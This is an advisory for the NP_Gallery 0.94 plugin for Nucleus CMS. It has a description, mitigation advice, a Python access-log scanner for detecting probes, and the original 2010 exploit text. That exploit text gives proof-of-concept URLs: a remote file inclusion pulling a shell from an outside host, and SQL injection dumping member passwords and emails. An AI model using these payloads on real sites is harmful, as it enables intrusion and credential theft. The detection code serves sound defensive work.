Vendor: NP_Gallery
By: AntiSecurity
CVSS: 8.8 (HIGH)
Type: Remote File Inclusion & SQL Injection
CWE: 89
Product Name: NP_Gallery
Affected Version From: 0.94
Affected Version To: 0.94
Patch Exists: YES
Related CWE: N/A
CPE: a:nucleus_cms:np_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Nucleus Plugin Gallery RFI & SQLi Vulnerability

NP_Gallery version 0.94 is vulnerable to Remote File Inclusion (RFI) and SQL Injection. Both are reachable with a crafted HTTP request to the vulnerable server. For the RFI, the request goes to the NP_gallery.php file with the DIR_NUCLEUS parameter set to a malicious URL. For the SQL injection, the request goes to the index.php file with the action, name, and type parameters set to plugin, gallery, and album or item respectively, and the id parameter set to a malicious SQL query.

Mitigation:

Upgrade to the latest version of NP_Gallery and apply the latest security patches.
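
To check whether a site was probed before the upgrade, web server access logs can be searched for the two request shapes described above. The following is an added example, not part of the original advisory or of NP_Gallery; the log lines are constructed, the function names are hypothetical, and it assumes that legitimate album and item ids are plain integers.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [29/May/2010:10:00:01 +0700] "GET /nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://host.example/x? HTTP/1.1" 200 512
203.0.113.5 - - [29/May/2010:10:00:07 +0700] "GET /index.php?action=plugin&name=gallery&type=album&id=1+and+1=2-- HTTP/1.1" 200 2048
198.51.100.9 - - [29/May/2010:10:01:00 +0700] "GET /index.php?action=plugin&name=gallery&type=item&id=42 HTTP/1.1" 200 1024
198.51.100.9 - - [29/May/2010:10:01:05 +0700] "GET /index.php?itemid=3 HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return 'RFI', 'SQLi' or None for one request target (path + query)."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    path = parts.path.lower()
    # The advisory shows DIR_NUCLEUS carrying a URL; flag any request that supplies it.
    if path.endswith("/np_gallery.php") and "DIR_NUCLEUS" in params:
        return "RFI"
    # Gallery plugin requests for an album or item, as described in the advisory.
    if (path.endswith("/index.php")
            and params.get("action") == ["plugin"]
            and params.get("name") == ["gallery"]
            and params.get("type", [""])[0] in ("album", "item")):
        # Assumption: a legitimate id is a plain integer; anything else is suspect.
        if any(not re.fullmatch(r"[0-9]+", v) for v in params.get("id", [])):
            return "SQLi"
    return None

def scan(log_text):
    """Return (line number, verdict, client address) for each matching log line."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            verdict = classify(m.group(1))
            if verdict:
                hits.append((lineno, verdict, line.split()[0]))
    return hits

if __name__ == "__main__":
    for lineno, verdict, client in scan(SAMPLE_LOG):
        print(f"line {lineno}: {verdict} pattern from {client}")
```

A match shows that a request of that shape was received, not that it succeeded; response sizes and any follow-up requests from the same client still need review.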

Exploit-DB raw data:

=============================================================================================================


  [o] Nucleus Plugin Gallery RFI & SQLi Vulnerability
 
       Software : NP_Gallery version 0.94
       Download : http://wakka.xiffy.nl/_media/np_gallery_0941.zip?id=gallery&cache=cache
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=[evilc0de]

       http://localhost/[path]/index.php?action=plugin&name=gallery&type=album&id=[SQLi]

       http://localhost/[path]/index.php?action=plugin&name=gallery&type=item&id=[SQLi]


  [o] PoC

       http://localhost/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://host.com/shell?

       http://localhost/index.php?action=plugin&name=gallery&type=album&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--

       http://localhost/index.php?action=plugin&name=gallery&type=item&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--


=============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 inc0mp13te
       ArRay bjork xmazinha veter f1 & all people in #evilc0de [at] irc.byroe.net


=============================================================================================================


  [o] May 29 2010 - GMT +07:00 Jakarta, Indonesia